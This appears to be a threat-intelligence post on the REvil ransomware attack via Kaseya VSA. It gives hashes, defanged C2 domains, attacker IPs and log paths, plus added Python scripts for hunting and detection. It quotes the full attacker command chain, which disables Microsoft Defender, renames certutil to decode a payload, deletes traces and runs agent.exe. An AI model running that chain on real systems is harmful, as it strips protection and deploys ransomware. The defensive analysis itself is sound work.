The ransomware attack delivered through Kaseya VSA, which is still spreading rapidly, is one of the largest ransomware incidents on record and has affected hundreds of businesses globally. Kaseya VSA is a remote monitoring and management (RMM) product that regularly pushes updates and scripts to the endpoints it manages, a mechanism meant to keep those systems secure. In this case that same mechanism was subverted to push malicious software to customers' systems. The group behind the attack is REvil (also known as Sodinokibi), a Russian-speaking ransomware operation. The attackers exploited zero-day vulnerabilities in internet-facing on-premises VSA servers to bypass authentication and achieve arbitrary command execution, and then used standard VSA functionality (an agent procedure) to deploy the ransomware to managed endpoints. There is no evidence that Kaseya's VSA codebase itself was maliciously modified; this was exploitation of the VSA server rather than a poisoned software update. Organizations running VSA are checking their own servers and their customers' endpoints to contain the attack. Below are the latest indicators of compromise, compiled from the Sophos, Assura and Talos write-ups listed under References.
Indicators of Compromise
THREAT IDENTIFICATION: Kaseya VSA Ransomware Attack
DLL file hashes:
mpsvc.dll
SHA-256:
d8353cfc5e696d3ae402c7c70565c1e7f31e49bcf74a6e12e5ab044f306b4b20
cc0cdc6a3d843e22c98170713abf1d6ae06e8b5e34ed06ac3159adafe85e3bd6
0496ca57e387b10dfdac809de8a4e039f68e8d66535d5d19ec76d39f7d0a4402
Executable file hashes:
Updater.exe
SHA-256: dc6b0e8c1e9c113f0364e1c8370060dee3fcbe25b667ddeca7623a95cd21411f
agent.exe
SHA-256: d5ce6f36a06b0dc8ce8e7e2c9a53e66094c2adfc93cfac61dd09efe9ac45a75f
p.exe.TXT
SHA-256: aae6e388e774180bc3eb96dad5d5bfefd63d0eb7124d68b6991701936801f1c7
svchost.exe
SHA-256: 66490c59cb9630b53fa3fa7125b5c9511afde38edab4459065938c1974229ca8
srnmp.exe
SHA-256: 1fe9b489c25bb23b04d9996e8107671edee69bd6f6def2fe7ece38a0fb35f98e
0299e3c2536543885860c7b61e1efc3f.virus
SHA-256: df2d6ef0450660aaae62c429610b964949812df2da1c57646fc29aa51c3f031e
be6c46239e9c753de227bf1f3428e271.virus
SHA-256: 0496ca57e387b10dfdac809de8a4e039f68e8d66535d5d19ec76d39f7d0a4402
a560890b8af60b9824c73be74ef24a46.virus
SHA-256: 81d0c71f8b282076cd93fb6bb5bfd3932422d033109e2c92572fc49e4abc2471
agent.crt
SHA-256: 2093c195b6c1fd6ab9e1110c13096c5fe130b75a84a27748007ae52d9e951643
Command and control (C2) domains. Note that REvil samples embed a long list of domains, many of which belong to unrelated legitimate sites, so treat these as network indicators to alert on and verify before blocking at scale:
ncuccr[.]org
1team[.]es
4net[.]guru
35-40konkatsu[.]net
123vrachi[.]ru
4youbeautysalon[.]com
12starhd[.]online
101gowrie[.]com
8449nohate[.]org
1kbk[.]com[.]ua
365questions[.]org
321play[.]com[.]hk
candyhouseusa[.]com
andersongilmour[.]co[.]uk
facettenreich27[.]de
blgr[.]be
fannmedias[.]com
southeasternacademyofprosthodontics[.]org
filmstreamingvfcomplet[.]be
smartypractice[.]com
tanzschule-kieber[.]de
iqbalscientific[.]com
pasvenska[.]se
cursosgratuitosnainternet[.]com
bierensgebakkramen[.]nl
c2e-poitiers[.]com
gonzalezfornes[.]es
tonelektro[.]nl
milestoneshows[.]com
blossombeyond50[.]com
thomasvicino[.]com
kaotikkustomz[.]com
mindpackstudios[.]com
faroairporttransfers[.]net
daklesa[.]de
bxdf[.]info
simoneblum[.]de
gmto[.]fr
cerebralforce[.]net
myhostcloud[.]com
fotoscondron[.]com
sw1m[.]ru
homng[.]net
IIS access logs of a compromised VSA server:
POST /dl.asp curl/7.69.1
GET /done.asp curl/7.69.1
POST /cgi-bin/KUpload.dll curl/7.69.1
GET /done.asp curl/7.69.1
POST /cgi-bin/KUpload.dll curl/7.69.1
POST /userFilterTableRpt.asp curl/7.69.1
Source IP addresses:
35.226.94[.]113
161.35.239[.]148
162.253.124[.]162
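To hunt for the request sequence above in IIS logs, the following Python script is an added example (it is not from the original post or from any of the referenced vendors). It parses IIS W3C extended log lines using the #Fields header, keeps requests to the published URIs made with the curl/7.69.1 user agent, and reports per client IP whether the full six-request sequence is present. The log lines embedded below are constructed for the example; the field names are the IIS W3C defaults and the known-IP set is the one published above.

```python
"""Hunt IIS W3C logs for the Kaseya VSA exploitation request sequence.

Added example, not from the original post or any vendor. Field names follow the
IIS W3C extended format; the sample log lines are constructed, not real captures.
"""
import re
from collections import defaultdict

# Request sequence seen on compromised VSA servers, in order.
ATTACK_SEQUENCE = [
    ("POST", "/dl.asp"),
    ("GET", "/done.asp"),
    ("POST", "/cgi-bin/kupload.dll"),
    ("GET", "/done.asp"),
    ("POST", "/cgi-bin/kupload.dll"),
    ("POST", "/userfiltertablerpt.asp"),
]
SUSPICIOUS_URIS = {uri for _, uri in ATTACK_SEQUENCE}
ATTACK_UA = re.compile(r"^curl/7\.69\.1$", re.IGNORECASE)
# Source IPs published as indicators.
KNOWN_IPS = {"35.226.94.113", "161.35.239.148", "162.253.124.162"}


def parse_w3c(lines):
    """Yield one dict per data line, keyed by the most recent #Fields header."""
    fields = None
    for line in lines:
        line = line.rstrip("\n")
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line[len("#Fields:"):].split()
            continue
        if line.startswith("#") or fields is None:
            continue
        values = line.split(" ")
        if len(values) != len(fields):
            continue  # skip malformed lines rather than mis-align columns
        yield dict(zip(fields, values))


def find_hits(records):
    """Group matching (timestamp, method, uri) requests by client IP."""
    hits = defaultdict(list)
    for r in records:
        ua = r.get("cs(User-Agent)", "")
        uri = r.get("cs-uri-stem", "").lower()
        if uri in SUSPICIOUS_URIS and ATTACK_UA.match(ua):
            stamp = r.get("date", "") + " " + r.get("time", "")
            hits[r.get("c-ip", "?")].append((stamp, r.get("cs-method", "").upper(), uri))
    return hits


def matches_sequence(requests):
    """True if the client's requests contain the whole attack sequence, in order."""
    i = 0
    for _, method, uri in requests:
        if i < len(ATTACK_SEQUENCE) and (method, uri) == ATTACK_SEQUENCE[i]:
            i += 1
    return i == len(ATTACK_SEQUENCE)


def triage(lines):
    """Return {client_ip: {requests, full_sequence, known_ioc_ip}} for suspicious clients."""
    report = {}
    for ip, reqs in find_hits(parse_w3c(lines)).items():
        report[ip] = {
            "requests": len(reqs),
            "full_sequence": matches_sequence(reqs),
            "known_ioc_ip": ip in KNOWN_IPS,
        }
    return report


# Constructed sample log (not a real capture): one attacker sequence plus two benign lines.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2021-07-02 18:01:10 10.0.0.5 POST /dl.asp - 443 - 35.226.94.113 curl/7.69.1 - 200 0 0 120
2021-07-02 18:01:11 10.0.0.5 GET /done.asp - 443 - 35.226.94.113 curl/7.69.1 - 200 0 0 15
2021-07-02 18:01:12 10.0.0.5 POST /cgi-bin/KUpload.dll - 443 - 35.226.94.113 curl/7.69.1 - 200 0 0 340
2021-07-02 18:01:13 10.0.0.5 GET /done.asp - 443 - 35.226.94.113 curl/7.69.1 - 200 0 0 12
2021-07-02 18:01:14 10.0.0.5 POST /cgi-bin/KUpload.dll - 443 - 35.226.94.113 curl/7.69.1 - 200 0 0 290
2021-07-02 18:01:15 10.0.0.5 POST /userFilterTableRpt.asp - 443 - 35.226.94.113 curl/7.69.1 - 200 0 0 880
2021-07-02 18:02:00 10.0.0.5 GET /done.asp - 443 admin 192.0.2.10 Mozilla/5.0+(Windows+NT+10.0) - 200 0 0 9
2021-07-02 18:03:00 10.0.0.5 GET /robots.txt - 443 - 203.0.113.7 curl/7.69.1 - 200 0 0 30
"""

if __name__ == "__main__":
    for ip, info in triage(SAMPLE_LOG.splitlines()).items():
        print(ip, info)
```

Run it against real logs with `triage(open(path))`; a client that hits the full sequence is a near-certain compromise, while a single matching request from an unknown IP still deserves a look because the sequence can span log file rotations.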
Executed command lines (spawned on endpoints by the VSA agent):
"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 6258 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
Parent path: C:\Program Files (x86)\Kaseya\\AgentMon.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 -n 5693 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
Parent path: C:\Program Files (x86)\Kaseya\\AgentMon.exe
The two command lines differ only in the ping count, which is a randomized delay of roughly that many seconds. After the delay the chain disables Microsoft Defender protections with Set-MpPreference, copies certutil.exe to C:\Windows\cert.exe and appends a random value to it (so the copy no longer matches the known certutil hash), uses the renamed copy to base64-decode agent.crt into agent.exe, deletes the dropper and the renamed tool, and finally runs agent.exe. The parent process is the legitimate Kaseya agent, so a detection should key on cmd.exe spawned by AgentMon.exe running Set-MpPreference or a renamed certutil with -decode, not on the parent alone.
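The following Python script is an added example (not from the original post or any vendor) that decomposes a process-creation event into the stages of the chain above, so a detection rule can fire on the combination of stages rather than on a single token such as certutil.exe, which the attackers renamed. The sample event is constructed from the published command line; the parent path is assumed to be the agent's install directory and the `is_suspicious` threshold is an assumption to tune.

```python
"""Decompose the command chain pushed through the Kaseya agent into detection signals.

Added example, not from the original post or any vendor. Input is a process-creation
event (command line plus parent image); output is which stages of the published chain
are present. The sample event below is constructed from the published command line.
"""
import re

# Stage name and a regex applied to each '&'-separated command in the chain.
STAGES = [
    ("sleep_via_ping", re.compile(r"ping\s+127\.0\.0\.1\s+-n\s+(\d+)", re.I)),
    ("defender_tamper", re.compile(r"Set-MpPreference\b.*-DisableRealtimeMonitoring\s+\$true", re.I)),
    ("certutil_copy", re.compile(r"copy\s+/Y\s+\S*certutil\.exe\s+(\S+)", re.I)),
    ("certutil_hash_tamper", re.compile(r"echo\s+%RANDOM%\s*>>\s*(\S+)", re.I)),
    ("certutil_decode", re.compile(r"(\S+)\s+-decode\s+(\S+)\s+(\S+)", re.I)),
    ("cleanup", re.compile(r"^del\s+/q\s+/f\b", re.I)),
    ("payload_exec", re.compile(r"^(\S*\\kworking\\agent\.exe)$", re.I)),
]
DEFENDER_FLAGS = re.compile(r"-(Disable\w+)\s+\$true", re.I)


def split_chain(cmdline):
    """Split a cmd.exe /c chain on ' & ' into its individual commands."""
    return [seg.strip() for seg in re.split(r"\s&\s", cmdline) if seg.strip()]


def analyze(cmdline, parent_image):
    """Return the stages found, derived facts, and a simple score (number of stages)."""
    found = {}
    result = {"parent_is_kaseya_agent": parent_image.lower().endswith("\\agentmon.exe")}
    for seg in split_chain(cmdline):
        for name, rx in STAGES:
            m = rx.search(seg)
            if m and name not in found:
                found[name] = m.groups()
        if "set-mppreference" in seg.lower():
            result["defender_settings_disabled"] = DEFENDER_FLAGS.findall(seg)
    if "sleep_via_ping" in found:
        result["delay_seconds"] = int(found["sleep_via_ping"][0])
    if "certutil_decode" in found:
        tool, _src, dst = found["certutil_decode"]
        # certutil run under any other name is itself a signal.
        result["renamed_certutil"] = not tool.lower().endswith("certutil.exe")
        result["dropped_payload"] = dst
    result["stages"] = found
    result["score"] = len(found)
    return result


def is_suspicious(result):
    """Assumed alerting threshold: several chained stages, or Defender tampering from the RMM agent."""
    if result["score"] >= 3:
        return True
    return "defender_tamper" in result["stages"] and result["parent_is_kaseya_agent"]


# Constructed sample event built from the published command line (parent path assumed).
SAMPLE_EVENT = {
    "CommandLine": r'"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 6258 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe',
    "ParentImage": r"C:\Program Files (x86)\Kaseya\AgentMon.exe",
}
# Constructed benign chain: a ping-based sleep alone should not alert.
BENIGN_CMD = r'"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 -n 3 > nul & echo done'

if __name__ == "__main__":
    r = analyze(SAMPLE_EVENT["CommandLine"], SAMPLE_EVENT["ParentImage"])
    print("suspicious:", is_suspicious(r), "score:", r["score"], "delay:", r["delay_seconds"])
```

Feed it Sysmon event ID 1 or Windows 4688 records (command line plus parent image); the same stage list also works as a Sigma-style rule, one selection per stage, with the score as the condition.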
Registry key (created by the ransomware payload): HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\BlackLivesMatter
References:
1. https://community.sophos.com/b/security-blog/posts/active-ransomware-attack-on-kaseya-customers
2. https://www.assurainc.com/kaseyas-vsa-supply-chain-ransomware/amp-on/
3. https://blog.talosintelligence.com/2021/07/revil-ransomware-actors-attack-kaseya.html